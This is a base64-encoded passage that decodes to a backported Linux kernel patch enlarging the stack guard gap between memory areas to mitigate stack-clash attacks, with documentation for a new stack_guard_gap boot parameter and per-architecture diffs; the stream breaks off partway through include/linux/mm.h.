-RnJvbSA0NWM2MGU1OTU3NThjZTkzNDMxZTcyMDUxYzUyNTUyZWU1N2FmM2ExIE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBIdWdoIERpY2tpbnMgPGh1Z2hkQGdvb2dsZS5jb20+CkRhdGU6IE1vbiwgMTkgSnVuIDIwMTcgMDQ6MDM6MjQgLTA3MDAKU3ViamVjdDogW1BBVENIXSBtbTogbGFyZ2VyIHN0YWNrIGd1YXJkIGdhcCwgYmV0d2VlbiB2bWFzCgpjb21taXQgMWJlNzEwN2ZiZTE4ZWVkM2UzMTlhNmMzZTgzYzc4MjU0YjY5M2FjYiB1cHN0cmVhbS4KClN0YWNrIGd1YXJkIHBhZ2UgaXMgYSB1c2VmdWwgZmVhdHVyZSB0byByZWR1Y2UgYSByaXNrIG9mIHN0YWNrIHNtYXNoaW5nCmludG8gYSBkaWZmZXJlbnQgbWFwcGluZy4gV2UgaGF2ZSBiZWVuIHVzaW5nIGEgc2luZ2xlIHBhZ2UgZ2FwIHdoaWNoCmlzIHN1ZmZpY2llbnQgdG8gcHJldmVudCBoYXZpbmcgc3RhY2sgYWRqYWNlbnQgdG8gYSBkaWZmZXJlbnQgbWFwcGluZy4KQnV0IHRoaXMgc2VlbXMgdG8gYmUgaW5zdWZmaWNpZW50IGluIHRoZSBsaWdodCBvZiB0aGUgc3RhY2sgdXNhZ2UgaW4KdXNlcnNwYWNlLiBFLmcuIGdsaWJjIHVzZXMgYXMgbGFyZ2UgYXMgNjRrQiBhbGxvY2EoKSBpbiBtYW55IGNvbW1vbmx5CnVzZWQgZnVuY3Rpb25zLiBPdGhlcnMgdXNlIGNvbnN0cnVjdHMgbGlrcyBnaWRfdCBidWZmZXJbTkdST1VQU19NQVhdCndoaWNoIGlzIDI1NmtCIG9yIHN0YWNrIHN0cmluZ3Mgd2l0aCBNQVhfQVJHX1NUUkxFTi4KClRoaXMgd2lsbCBiZWNvbWUgZXNwZWNpYWxseSBkYW5nZXJvdXMgZm9yIHN1aWQgYmluYXJpZXMgYW5kIHRoZSBkZWZhdWx0Cm5vIGxpbWl0IGZvciB0aGUgc3RhY2sgc2l6ZSBsaW1pdCBiZWNhdXNlIHRob3NlIGFwcGxpY2F0aW9ucyBjYW4gYmUKdHJpY2tlZCB0byBjb25zdW1lIGEgbGFyZ2UgcG9ydGlvbiBvZiB0aGUgc3RhY2sgYW5kIGEgc2luZ2xlIGdsaWJjIGNhbGwKY291bGQganVtcCBvdmVyIHRoZSBndWFyZCBwYWdlLiBUaGVzZSBhdHRhY2tzIGFyZSBub3QgdGhlb3JldGljYWwsCnVuZm9ydHVuYXRlbGx5LgoKTWFrZSB0aG9zZSBhdHRhY2tzIGxlc3MgcHJvYmFibGUgYnkgaW5jcmVhc2luZyB0aGUgc3RhY2sgZ3VhcmQgZ2FwCnRvIDFNQiAob24gc3lzdGVtcyB3aXRoIDRrIHBhZ2VzOyBidXQgbWFrZSBpdCBkZXBlbmQgb24gdGhlIHBhZ2Ugc2l6ZQpiZWNhdXNlIHN5c3RlbXMgd2l0aCBsYXJnZXIgYmFzZSBwYWdlcyBtaWdodCBjYXAgc3RhY2sgYWxsb2NhdGlvbnMgaW4KdGhlIFBBR0VfU0laRSB1bml0cykgd2hpY2ggc2hvdWxkIGNvdmVyIGxhcmdlciBhbGxvY2EoKSBhbmQgVkxBIHN0YWNrCmFsbG9jYXRpb25zLiBJdCBpcyBvYnZpb3VzbHkgbm90IGEgZnVsbCBmaXggYmVjYXVzZSB0aGUgcHJvYmxlbSBpcwpzb21laG93IGluaGVyZW50LCBidXQgaXQgc2hvdWxkIHJlZHVjZSBhdHRhY2sgc3BhY2UgYSBsb3QuCgpPbmUgY291bGQgYXJndWUgdGhhdCB0aGUgZ2FwIHNpemUgc2hvdWxkIGJlIGNvbmZpZ3VyYWJsZSBmcm9tIHVzZXJzcGFjZSwKYnV0IHRoYXQgY2FuIGJlIGRvbmUgbGF0ZXIgd2hlbiBzb21lYm9keSBmaW5kcyB0aGF0IHRoZSBuZXcgMU1CIGlzIHdyb25nCmZvciBzb21lIHNwZWNpYWwgY2FzZSBhcHBsaWNhdGlvbnMuICBGb3Igbm93LCBhZGQgYSBrZXJuZWwgY29tbWFuZCBsaW5lCm9wdGlvbiAoc3RhY2tfZ3VhcmRfZ2FwKSB0byBzcGVjaWZ5IHRoZSBzdGFjayBnYXAgc2l6ZSAoaW4gcGFnZSB1bml0cykuCgpJbXBsZW1lbnRhdGlvbiB3aXNlLCBmaXJzdCBkZWxldGUgYWxsIHRoZSBvbGQgY29kZSBmb3Igc3RhY2sgZ3VhcmQgcGFnZToKYmVjYXVzZSBhbHRob3VnaCB3ZSBjb3VsZCBnZXQgYXdheSB3aXRoIGFjY291bnRpbmcgb25lIGV4dHJhIHBhZ2UgaW4gYQpzdGFjayB2bWEsIGFjY291bnRpbmcgYSBsYXJnZXIgZ2FwIGNhbiBicmVhayB1c2Vyc3BhY2UgLSBjYXNlIGluIHBvaW50LAphIHByb2dyYW0gcnVuIHdpdGggInVsaW1pdCAtUyAtdiAyMDAwMCIgZmFpbGVkIHdoZW4gdGhlIDFNQiBnYXAgd2FzCmNvdW50ZWQgZm9yIFJMSU1JVF9BUzsgc2ltaWxhciBwcm9ibGVtcyBjb3VsZCBjb21lIHdpdGggUkxJTUlUX01MT0NLCmFuZCBzdHJpY3Qgbm9uLW92ZXJjb21taXQgbW9kZS4KCkluc3RlYWQgb2Yga2VlcGluZyBnYXAgaW5zaWRlIHRoZSBzdGFjayB2bWEsIG1haW50YWluIHRoZSBzdGFjayBndWFyZApnYXAgYXMgYSBnYXAgYmV0d2VlbiB2bWFzOiB1c2luZyB2bV9zdGFydF9nYXAoKSBpbiBwbGFjZSBvZiB2bV9zdGFydAoob3Igdm1fZW5kX2dhcCgpIGluIHBsYWNlIG9mIHZtX2VuZCBpZiBWTV9HUk9XU1VQKSBpbiBqdXN0IHRob3NlIGZldwpwbGFjZXMgd2hpY2ggbmVlZCB0byByZXNwZWN0IHRoZSBnYXAgLSBtYWlubHkgYXJjaF9nZXRfdW5tYXBwZWRfYXJlYSgpLAphbmQgYW5kIHRoZSB2bWEgdHJlZSdzIHN1YnRyZWVfZ2FwIHN1cHBvcnQgZm9yIHRoYXQuCgpDaGFuZ2UtSWQ6IEk2MTEwMjNiMGJmZTFjYWI3YjNlNWRhMTNlMzMxYTdiYWFhYWY2ZWIwCk9yaWdpbmFsLXBhdGNoLWJ5OiBPbGVnIE5lc3Rlcm92IDxvbGVnQHJlZGhhdC5jb20+Ck9yaWdpbmFsLXBhdGNoLWJ5OiBNaWNoYWwgSG9ja28gPG1ob2Nrb0BzdXNlLmNvbT4KU2lnbmVkLW9mZi1ieTogSHVnaCBEaWNraW5zIDxodWdoZEBnb29nbGUuY29tPgpbd3Q6IGJhY2twb3J0IHRvIDQuMTE6IGFkanVzdCBjb250ZXh0XQpbd3Q6IGJhY2twb3J0IHRvIDQuOTogYWRqdXN0IGNvbnRleHQgOyBrZXJuZWwgZG9jIHdhcyBub3QgaW4gYWRtaW4tZ3VpZGVdClt3dDogYmFja3BvcnQgdG8gNC40OiBhZGp1c3QgY29udGV4dCA7IGRyb3AgcHBjIGh1Z2V0bGJfcmFkaXggY2hhbmdlc10KW3d0OiBiYWNrcG9ydCB0byAzLjE4OiBhZGp1c3QgY29udGV4dCA7IG5vIEZPTExfUE9QVUxBVEUgOwogICAgIHMzOTAgdXNlcyBnZW5lcmljIGFyY2hfZ2V0X3VubWFwcGVkX2FyZWEoKV0KW3d0OiBiYWNrcG9ydCB0byAzLjE2OiBhZGp1c3QgY29udGV4dF0KW3d0OiBiYWNrcG9ydCB0byAzLjEwOiBhZGp1c3QgY29udGV4dCA7IGNvZGUgbG9naWMgaW4gUEFSSVNDJ3MKICAgICBhcmNoX2dldF91bm1hcHBlZF9hcmVhKCkgd2Fzbid0IGZvdW5kIDsgY29kZSBpbnNlcnRlZCBpbnRvCiAgICAgZXhwYW5kX3Vwd2FyZHMoKSBhbmQgZXhwYW5kX2Rvd253YXJkcygpIHJ1bnMgdW5kZXIgYW5vbl92bWEgbG9jazsKICAgICBjaGFuZ2VzIGZvciBndXAuYzpmYXVsdGluX3BhZ2UgZ28gdG8gbWVtb3J5LmM6X19nZXRfdXNlcl9wYWdlcygpOwogICAgIGluY2x1ZGVkIEh1Z2ggRGlja2lucycgZml4ZXNdClNpZ25lZC1vZmYtYnk6IFdpbGx5IFRhcnJlYXUgPHdAMXd0LmV1PgpTaWduZWQtb2ZmLWJ5OiBGbGV4MTkxMSA8ZGVkc2EyMDAyQGdtYWlsLmNvbT4KLS0tCgpkaWZmIC0tZ2l0IGEvRG9jdW1lbnRhdGlvbi9rZXJuZWwtcGFyYW1ldGVycy50eHQgYi9Eb2N1bWVudGF0aW9uL2tlcm5lbC1wYXJhbWV0ZXJzLnR4dAppbmRleCA5YTFjNzU5Li41M2JlMmM5IDEwMDY0NAotLS0gYS9Eb2N1bWVudGF0aW9uL2tlcm5lbC1wYXJhbWV0ZXJzLnR4dAorKysgYi9Eb2N1bWVudGF0aW9uL2tlcm5lbC1wYXJhbWV0ZXJzLnR4dApAQCAtMjU1MCw2ICsyNTUwLDEzIEBACiAJc3BpYV9wZWRyPQogCXNwaWFfcGVkZHI9CiAKKwlzdGFja19ndWFyZF9nYXA9CVtNTV0KKwkJCW92ZXJyaWRlIHRoZSBkZWZhdWx0IHN0YWNrIGdhcCBwcm90ZWN0aW9uLiBUaGUgdmFsdWUKKwkJCWlzIGluIHBhZ2UgdW5pdHMgYW5kIGl0IGRlZmluZXMgaG93IG1hbnkgcGFnZXMgcHJpb3IKKwkJCXRvIChmb3Igc3RhY2tzIGdyb3dpbmcgZG93bikgcmVzcC4gYWZ0ZXIgKGZvciBzdGFja3MKKwkJCWdyb3dpbmcgdXApIHRoZSBtYWluIHN0YWNrIGFyZSByZXNlcnZlZCBmb3Igbm8gb3RoZXIKKwkJCW1hcHBpbmcuIERlZmF1bHQgdmFsdWUgaXMgMjU2IHBhZ2VzLgorCiAJc3RhY2t0cmFjZQlbRlRSQUNFXQogCQkJRW5hYmxlZCB0aGUgc3RhY2sgdHJhY2VyIG9uIGJvb3QgdXAuCiAKZGlmZiAtLWdpdCBhL2FyY2gvYXJtL21tL21tYXAuYyBiL2FyY2gvYXJtL21tL21tYXAuYwppbmRleCBhMjY5NjBhLi5mMDU4Y2EyIDEwMDY0NAotLS0gYS9hcmNoL2FybS9tbS9tbWFwLmMKKysrIGIvYXJjaC9hcm0vbW0vbW1hcC5jCkBAIC0xMDEsNyArMTAxLDcgQEAKIAogCQl2bWEgPSBmaW5kX3ZtYShtbSwgYWRkcik7CiAJCWlmIChUQVNLX1NJWkUgLSBsZW4gPj0gYWRkciAmJgotCQkgICAgKCF2bWEgfHwgYWRkciArIGxlbiA8PSB2bWEtPnZtX3N0YXJ0KSkKKwkJICAgICghdm1hIHx8IGFkZHIgKyBsZW4gPD0gdm1fc3RhcnRfZ2FwKHZtYSkpKQogCQkJcmV0dXJuIGFkZHI7CiAJfQogCWlmIChsZW4gPiBtbS0+Y2FjaGVkX2hvbGVfc2l6ZSkgewpAQCAtMTgzLDcgKzE4Myw3IEBACiAJCQlhZGRyID0gUEFHRV9BTElHTihhZGRyKTsKIAkJdm1hID0gZmluZF92bWEobW0sIGFkZHIpOwogCQlpZiAoVEFTS19TSVpFIC0gbGVuID49IGFkZHIgJiYKLQkJCQkoIXZtYSB8fCBhZGRyICsgbGVuIDw9IHZtYS0+dm1fc3RhcnQpKQorCQkJCSghdm1hIHx8IGFkZHIgKyBsZW4gPD0gdm1fc3RhcnRfZ2FwKHZtYSkpKQogCQkJcmV0dXJuIGFkZHI7CiAJfQogCmRpZmYgLS1naXQgYS9hcmNoL2Zydi9tbS9lbGYtZmRwaWMuYyBiL2FyY2gvZnJ2L21tL2VsZi1mZHBpYy5jCmluZGV4IDM4NWZkMzAuLmNkNzYwNTYgMTAwNjQ0Ci0tLSBhL2FyY2gvZnJ2L21tL2VsZi1mZHBpYy5jCisrKyBiL2FyY2gvZnJ2L21tL2VsZi1mZHBpYy5jCkBAIC03NCw3ICs3NCw3IEBACiAJCWFkZHIgPSBQQUdFX0FMSUdOKGFkZHIpOwogCQl2bWEgPSBmaW5kX3ZtYShjdXJyZW50LT5tbSwgYWRkcik7CiAJCWlmIChUQVNLX1NJWkUgLSBsZW4gPj0gYWRkciAmJgotCQkgICAgKCF2bWEgfHwgYWRkciArIGxlbiA8PSB2bWEtPnZtX3N0YXJ0KSkKKwkJICAgICghdm1hIHx8IGFkZHIgKyBsZW4gPD0gdm1fc3RhcnRfZ2FwKHZtYSkpKQogCQkJZ290byBzdWNjZXNzOwogCX0KIApkaWZmIC0tZ2l0IGEvYXJjaC9taXBzL21tL21tYXAuYyBiL2FyY2gvbWlwcy9tbS9tbWFwLmMKaW5kZXggMzAyZDc3OS4uNjNjMDdiZCAxMDA2NDQKLS0tIGEvYXJjaC9taXBzL21tL21tYXAuYworKysgYi9hcmNoL21pcHMvbW0vbW1hcC5jCkBAIC0xMDMsNyArMTAzLDcgQEAKIAogCQl2bWEgPSBmaW5kX3ZtYShtbSwgYWRkcik7CiAJCWlmIChUQVNLX1NJWkUgLSBsZW4gPj0gYWRkciAmJgotCQkgICAgKCF2bWEgfHwgYWRkciArIGxlbiA8PSB2bWEtPnZtX3N0YXJ0KSkKKwkJICAgICghdm1hIHx8IGFkZHIgKyBsZW4gPD0gdm1fc3RhcnRfZ2FwKHZtYSkpKQogCQkJcmV0dXJuIGFkZHI7CiAJfQogCmRpZmYgLS1naXQgYS9hcmNoL3Bvd2VycGMvbW0vc2xpY2UuYyBiL2FyY2gvcG93ZXJwYy9tbS9zbGljZS5jCmluZGV4IDczNzA5ZjcuLjljZjAwMWYgMTAwNjQ0Ci0tLSBhL2FyY2gvcG93ZXJwYy9tbS9zbGljZS5jCisrKyBiL2FyY2gvcG93ZXJwYy9tbS9zbGljZS5jCkBAIC05OCw3ICs5OCw3IEBACiAJaWYgKChtbS0+dGFza19zaXplIC0gbGVuKSA8IGFkZHIpCiAJCXJldHVybiAwOwogCXZtYSA9IGZpbmRfdm1hKG1tLCBhZGRyKTsKLQlyZXR1cm4gKCF2bWEgfHwgKGFkZHIgKyBsZW4pIDw9IHZtYS0+dm1fc3RhcnQpOworCXJldHVybiAoIXZtYSB8fCAoYWRkciArIGxlbikgPD0gdm1fc3RhcnRfZ2FwKHZtYSkpOwogfQogCiBzdGF0aWMgaW50IHNsaWNlX2xvd19oYXNfdm1hKHN0cnVjdCBtbV9zdHJ1Y3QgKm1tLCB1bnNpZ25lZCBsb25nIHNsaWNlKQpkaWZmIC0tZ2l0IGEvYXJjaC9zaC9tbS9tbWFwLmMgYi9hcmNoL3NoL21tL21tYXAuYwppbmRleCBhZmViNzEwLi5kMDI3NDE2IDEwMDY0NAotLS0gYS9hcmNoL3NoL21tL21tYXAuYworKysgYi9hcmNoL3NoL21tL21tYXAuYwpAQCAtNzUsNyArNzUsNyBAQAogCiAJCXZtYSA9IGZpbmRfdm1hKG1tLCBhZGRyKTsKIAkJaWYgKFRBU0tfU0laRSAtIGxlbiA+PSBhZGRyICYmCi0JCSAgICAoIXZtYSB8fCBhZGRyICsgbGVuIDw9IHZtYS0+dm1fc3RhcnQpKQorCQkgICAgKCF2bWEgfHwgYWRkciArIGxlbiA8PSB2bV9zdGFydF9nYXAodm1hKSkpCiAJCQlyZXR1cm4gYWRkcjsKIAl9CiAKQEAgLTE1OCw3ICsxNTgsNyBAQAogCiAJCXZtYSA9IGZpbmRfdm1hKG1tLCBhZGRyKTsKIAkJaWYgKFRBU0tfU0laRSAtIGxlbiA+PSBhZGRyICYmCi0JCSAgICAoIXZtYSB8fCBhZGRyICsgbGVuIDw9IHZtYS0+dm1fc3RhcnQpKQorCQkgICAgKCF2bWEgfHwgYWRkciArIGxlbiA8PSB2bV9zdGFydF9nYXAodm1hKSkpCiAJCQlyZXR1cm4gYWRkcjsKIAl9CiAKZGlmZiAtLWdpdCBhL2FyY2gvc3BhcmMva2VybmVsL3N5c19zcGFyY182NC5jIGIvYXJjaC9zcGFyYy9rZXJuZWwvc3lzX3NwYXJjXzY0LmMKaW5kZXggM2VlNTFmMS4uMTBhODNhYyAxMDA2NDQKLS0tIGEvYXJjaC9zcGFyYy9rZXJuZWwvc3lzX3NwYXJjXzY0LmMKKysrIGIvYXJjaC9zcGFyYy9rZXJuZWwvc3lzX3NwYXJjXzY0LmMKQEAgLTE0Nyw3ICsxNDcsNyBAQAogCiAJCXZtYSA9IGZpbmRfdm1hKG1tLCBhZGRyKTsKIAkJaWYgKHRhc2tfc2l6ZSAtIGxlbiA+PSBhZGRyICYmCi0JCSAgICAoIXZtYSB8fCBhZGRyICsgbGVuIDw9IHZtYS0+dm1fc3RhcnQpKQorCQkgICAgKCF2bWEgfHwgYWRkciArIGxlbiA8PSB2bV9zdGFydF9nYXAodm1hKSkpCiAJCQlyZXR1cm4gYWRkcjsKIAl9CiAKQEAgLTIzNyw3ICsyMzcsNyBAQAogCiAJCXZtYSA9IGZpbmRfdm1hKG1tLCBhZGRyKTsKIAkJaWYgKHRhc2tfc2l6ZSAtIGxlbiA+PSBhZGRyICYmCi0JCSAgICAoIXZtYSB8fCBhZGRyICsgbGVuIDw9IHZtYS0+dm1fc3RhcnQpKQorCQkgICAgKCF2bWEgfHwgYWRkciArIGxlbiA8PSB2bV9zdGFydF9nYXAodm1hKSkpCiAJCQlyZXR1cm4gYWRkcjsKIAl9CiAKZGlmZiAtLWdpdCBhL2FyY2gvc3BhcmMvbW0vaHVnZXRsYnBhZ2UuYyBiL2FyY2gvc3BhcmMvbW0vaHVnZXRsYnBhZ2UuYwppbmRleCAwN2UxNDUzLi45ZjA3NjQxIDEwMDY0NAotLS0gYS9hcmNoL3NwYXJjL21tL2h1Z2V0bGJwYWdlLmMKKysrIGIvYXJjaC9zcGFyYy9tbS9odWdldGxicGFnZS5jCkBAIC0xODIsNyArMTgyLDcgQEAKIAkJYWRkciA9IEFMSUdOKGFkZHIsIEhQQUdFX1NJWkUpOwogCQl2bWEgPSBmaW5kX3ZtYShtbSwgYWRkcik7CiAJCWlmICh0YXNrX3NpemUgLSBsZW4gPj0gYWRkciAmJgotCQkgICAgKCF2bWEgfHwgYWRkciArIGxlbiA8PSB2bWEtPnZtX3N0YXJ0KSkKKwkJICAgICghdm1hIHx8IGFkZHIgKyBsZW4gPD0gdm1fc3RhcnRfZ2FwKHZtYSkpKQogCQkJcmV0dXJuIGFkZHI7CiAJfQogCWlmIChtbS0+Z2V0X3VubWFwcGVkX2FyZWEgPT0gYXJjaF9nZXRfdW5tYXBwZWRfYXJlYSkKZGlmZiAtLWdpdCBhL2FyY2gvdGlsZS9tbS9odWdldGxicGFnZS5jIGIvYXJjaC90aWxlL21tL2h1Z2V0bGJwYWdlLmMKaW5kZXggNDJjZmNiYS4uZDY1OTczNiAxMDA2NDQKLS0tIGEvYXJjaC90aWxlL21tL2h1Z2V0bGJwYWdlLmMKKysrIGIvYXJjaC90aWxlL21tL2h1Z2V0bGJwYWdlLmMKQEAgLTMxMiw3ICszMTIsNyBAQAogCQlhZGRyID0gQUxJR04oYWRkciwgaHVnZV9wYWdlX3NpemUoaCkpOwogCQl2bWEgPSBmaW5kX3ZtYShtbSwgYWRkcik7CiAJCWlmIChUQVNLX1NJWkUgLSBsZW4gPj0gYWRkciAmJgotCQkgICAgKCF2bWEgfHwgYWRkciArIGxlbiA8PSB2bWEtPnZtX3N0YXJ0KSkKKwkJICAgICghdm1hIHx8IGFkZHIgKyBsZW4gPD0gdm1fc3RhcnRfZ2FwKHZtYSkpKQogCQkJcmV0dXJuIGFkZHI7CiAJfQogCWlmIChjdXJyZW50LT5tbS0+Z2V0X3VubWFwcGVkX2FyZWEgPT0gYXJjaF9nZXRfdW5tYXBwZWRfYXJlYSkKZGlmZiAtLWdpdCBhL2FyY2gveDg2L2tlcm5lbC9zeXNfeDg2XzY0LmMgYi9hcmNoL3g4Ni9rZXJuZWwvc3lzX3g4Nl82NC5jCmluZGV4IGI0ZDNjMzkuLjk5NjM3OGIgMTAwNjQ0Ci0tLSBhL2FyY2gveDg2L2tlcm5lbC9zeXNfeDg2XzY0LmMKKysrIGIvYXJjaC94ODYva2VybmVsL3N5c194ODZfNjQuYwpAQCAtMTQxLDcgKzE0MSw3IEBACiAJCWFkZHIgPSBQQUdFX0FMSUdOKGFkZHIpOwogCQl2bWEgPSBmaW5kX3ZtYShtbSwgYWRkcik7CiAJCWlmIChlbmQgLSBsZW4gPj0gYWRkciAmJgotCQkgICAgKCF2bWEgfHwgYWRkciArIGxlbiA8PSB2bWEtPnZtX3N0YXJ0KSkKKwkJICAgICghdm1hIHx8IGFkZHIgKyBsZW4gPD0gdm1fc3RhcnRfZ2FwKHZtYSkpKQogCQkJcmV0dXJuIGFkZHI7CiAJfQogCWlmICgoKGZsYWdzICYgTUFQXzMyQklUKSB8fCB0ZXN0X3RocmVhZF9mbGFnKFRJRl9BRERSMzIpKQpAQCAtMjEzLDcgKzIxMyw3IEBACiAJCWFkZHIgPSBQQUdFX0FMSUdOKGFkZHIpOwogCQl2bWEgPSBmaW5kX3ZtYShtbSwgYWRkcik7CiAJCWlmIChUQVNLX1NJWkUgLSBsZW4gPj0gYWRkciAmJgotCQkJCSghdm1hIHx8IGFkZHIgKyBsZW4gPD0gdm1hLT52bV9zdGFydCkpCisJCQkJKCF2bWEgfHwgYWRkciArIGxlbiA8PSB2bV9zdGFydF9nYXAodm1hKSkpCiAJCQlyZXR1cm4gYWRkcjsKIAl9CiAKZGlmZiAtLWdpdCBhL2FyY2gveDg2L21tL2h1Z2V0bGJwYWdlLmMgYi9hcmNoL3g4Ni9tbS9odWdldGxicGFnZS5jCmluZGV4IGY2Njc5YTcuLmRiYzkwZTYgMTAwNjQ0Ci0tLSBhL2FyY2gveDg2L21tL2h1Z2V0bGJwYWdlLmMKKysrIGIvYXJjaC94ODYvbW0vaHVnZXRsYnBhZ2UuYwpAQCAtNDExLDcgKzQxMSw3IEBACiAJCWFkZHIgPSBBTElHTihhZGRyLCBodWdlX3BhZ2Vfc2l6ZShoKSk7CiAJCXZtYSA9IGZpbmRfdm1hKG1tLCBhZGRyKTsKIAkJaWYgKFRBU0tfU0laRSAtIGxlbiA+PSBhZGRyICYmCi0JCSAgICAoIXZtYSB8fCBhZGRyICsgbGVuIDw9IHZtYS0+dm1fc3RhcnQpKQorCQkgICAgKCF2bWEgfHwgYWRkciArIGxlbiA8PSB2bV9zdGFydF9nYXAodm1hKSkpCiAJCQlyZXR1cm4gYWRkcjsKIAl9CiAJaWYgKG1tLT5nZXRfdW5tYXBwZWRfYXJlYSA9PSBhcmNoX2dldF91bm1hcHBlZF9hcmVhKQpkaWZmIC0tZ2l0IGEvZnMvaHVnZXRsYmZzL2lub2RlLmMgYi9mcy9odWdldGxiZnMvaW5vZGUuYwppbmRleCAwMDFlZjAxLi42MjhiMzI0IDEwMDY0NAotLS0gYS9mcy9odWdldGxiZnMvaW5vZGUuYworKysgYi9mcy9odWdldGxiZnMvaW5vZGUuYwpAQCAtMTY5LDcgKzE2OSw3IEBACiAJCWFkZHIgPSBBTElHTihhZGRyLCBodWdlX3BhZ2Vfc2l6ZShoKSk7CiAJCXZtYSA9IGZpbmRfdm1hKG1tLCBhZGRyKTsKIAkJaWYgKFRBU0tfU0laRSAtIGxlbiA+PSBhZGRyICYmCi0JCSAgICAoIXZtYSB8fCBhZGRyICsgbGVuIDw9IHZtYS0+dm1fc3RhcnQpKQorCQkgICAgKCF2bWEgfHwgYWRkciArIGxlbiA8PSB2bV9zdGFydF9nYXAodm1hKSkpCiAJCQlyZXR1cm4gYWRkcjsKIAl9CiAKZGlmZiAtLWdpdCBhL2ZzL3Byb2MvdGFza19tbXUuYyBiL2ZzL3Byb2MvdGFza19tbXUuYwppbmRleCBlZjVjN2UyLi42MjM0MDA0IDEwMDY0NAotLS0gYS9mcy9wcm9jL3Rhc2tfbW11LmMKKysrIGIvZnMvcHJvYy90YXNrX21tdS5jCkBAIC0yODMsMTEgKzI4Myw3IEBACiAKIAkvKiBXZSBkb24ndCBzaG93IHRoZSBzdGFjayBndWFyZCBwYWdlIGluIC9wcm9jL21hcHMgKi8KIAlzdGFydCA9IHZtYS0+dm1fc3RhcnQ7Ci0JaWYgKHN0YWNrX2d1YXJkX3BhZ2Vfc3RhcnQodm1hLCBzdGFydCkpCi0JCXN0YXJ0ICs9IFBBR0VfU0laRTsKIAllbmQgPSB2bWEtPnZtX2VuZDsKLQlpZiAoc3RhY2tfZ3VhcmRfcGFnZV9lbmQodm1hLCBlbmQpKQotCQllbmQgLT0gUEFHRV9TSVpFOwogCiAJc2VxX3ByaW50ZihtLCAiJTA4bHgtJTA4bHggJWMlYyVjJWMgJTA4bGx4ICUwMng6JTAyeCAlbHUgJW4iLAogCQkJc3RhcnQsCmRpZmYgLS1naXQgYS9pbmNsdWRlL2xpbnV4L21tLmggYi9pbmNsdWRlL2xpbnV4L21tLmgKaW5kZXggY2U1N2ZkMC4uZTU5Nzc3NSAxMDA2NDQKLS0tIGEvaW5jbHVkZS9saW51eC9tbS5oCisrKyBiL2luY2x1ZGUvbGludXgvbW0uaApAQCAtMTAzMCwzNCArMTAzMCw2IEBACiBpbnQgc2V0X3BhZ2VfZGlydHlfbG9jayhzdHJ1Y3QgcGFnZSAqcGFnZSk7CiBpbnQgY2xlYXJfcGFnZV9kaXJ0eV9mb3JfaW8oc3RydWN0IHBhZ2UgKnBhZ2UpOwogCi0vKiBJcyB0aGUgdm1hIGEgY29udGludWF0aW9uIG9mIHRoZSBzdGFjayB2bWEgYWJvdmUgaXQ/ICovCi1zdGF0aWMgaW5saW5lIGludCB2bWFfZ3Jvd3Nkb3duKHN0cnVjdCB2bV9hcmVhX3N0cnVjdCAqdm1hLCB1bnNpZ25lZCBsb25nIGFkZHIpCi17Ci0JcmV0dXJuIHZtYSAmJiAodm1hLT52bV9lbmQgPT0gYWRkcikgJiYgKHZtYS0+dm1fZmxhZ3MgJiBWTV9HUk9XU0RPV04pOwotfQotCi1zdGF0aWMgaW5saW5lIGludCBzdGFja19ndWFyZF9wYWdlX3N0YXJ0KHN0cnVjdCB2bV9hcmVhX3N0cnVjdCAqdm1hLAotCQkJCQkgICAgIHVuc2lnbmVkIGxvbmcgYWRkcikKLXsKLQlyZXR1cm4gKHZtYS0+dm1fZmxhZ3MgJiBWTV9HUk9XU0RPV04pICYmCi0JCSh2bWEtPnZtX3N0YXJ0ID09IGFkZHIpICYmCi0JCSF2bWFfZ3Jvd3Nkb3duKHZtYS0+dm1fcHJldiwgYWRkcik7Ci19Ci0KLS8qIElzIHRoZSB2bWEgYSBjb250aW51YXRpb24gb2YgdGhlIHN0YWNrIHZtYSBiZWxvdyBpdD8gKi8KLXN0YXRpYyBpbmxpbmUgaW50IHZtYV9ncm93c3VwKHN0cnVjdCB2bV9hcmVhX3N0cnVjdCAqdm1hLCB1bnNpZ25lZCBsb25nIGFkZHIpCi17Ci0JcmV0dXJuIHZtYSAmJiAodm1hLT52bV9zdGFydCA9PSBhZGRyKSAmJiAodm1hLT52bV9mbGFncyAmIFZNX0dST1dTVVApOwotfQotCi1zdGF0aWMgaW5saW5lIGludCBzdGFja19ndWFyZF9wYWdlX2VuZChzdHJ1Y3Qgdm1fYXJlYV9zdHJ1Y3QgKnZtYSwKLQkJCQkJICAgdW5zaWduZWQgbG9uZyBhZGRyKQotewotCXJldHVybiAodm1hLT52bV9mbGFncyAmIFZNX0dST1dTVVApICYmCi0JCSh2bWEtPnZtX2VuZCA9PSBhZGRyKSAmJgotCQkhdm1hX2dyb3dzdXAodm1hLT52bV9uZXh0LCBhZGRyKTsKLX0KLQogZXh0ZXJuIHBpZF90CiB2bV9pc19zdGFjayhzdHJ1Y3QgdGFza19zdHJ1Y3QgKnRhc2ssIHN0cnVjdCB2bV9hcmVhX3N0cnVjdCAqdm1hLCBpbnQgaW5fZ3JvdXApOwogCkBAIC0xNDY3LDYgKzE0MzksNyBAQAogCQkJc3RydWN0IGFkZHJlc3Nfc3BhY2UgKm1hcHBpbmcsCiAJCQlzdHJ1Y3QgZmlsZSAqZmlscCk7CiAKK2V4dGVybiB1bnNpZ25lZCBsb25nIHN0YWNrX2d1YXJkX2dhcDsKIC8qIEdlbmVyaWMgZXhwYW5kIHN0YWNrIHdoaWNoIGdyb3dzIHRoZSBzdGFjayBhY2NvcmRpbmcgdG8gR1JPV1N7VVAsRE9XTn0gKi8KIGV4dGVybiBpbnQgZXhwYW5kX3N0YWNrKHN0cnVjdCB2bV9hcmVhX3N0cnVjdCAqdm1hLCB1bnNpZ25lZCBsb25nIGFkZHJlc3MpOwogCkBAIC0xNDk1LDYgKzE0NjgsMzAgQEAKIAlyZXR1cm4gdm1hOwogfQogCitzdGF0aWMgaW5saW5lIHVuc2lnbmVkIGxvbmcgdm1fc3RhcnRfZ2FwKHN0cnVjdCB2bV9hcmVhX3N0cnVjdCAqdm1hKQoreworCXVuc2lnbmVkIGxvbmcgdm1fc3RhcnQgPSB2bWEtPnZtX3N0YXJ0OworCisJaWYgKHZtYS0+dm1fZmxhZ3MgJiBWTV9HUk9XU0RPV04pIHsKKwkJdm1fc3RhcnQgLT0gc3RhY2tfZ3VhcmRfZ2FwOworCQlpZiAodm1fc3RhcnQgPiB2bWEtPnZtX3N0YXJ0KQorCQkJdm1fc3RhcnQgPSAwOworCX0KKwlyZXR1cm4gdm1fc3RhcnQ7Cit9CisKK3N0YXRpYyBpbmxpbmUgdW5zaWduZWQgbG9uZyB2bV9lbmRfZ2FwKHN0cnVjdCB2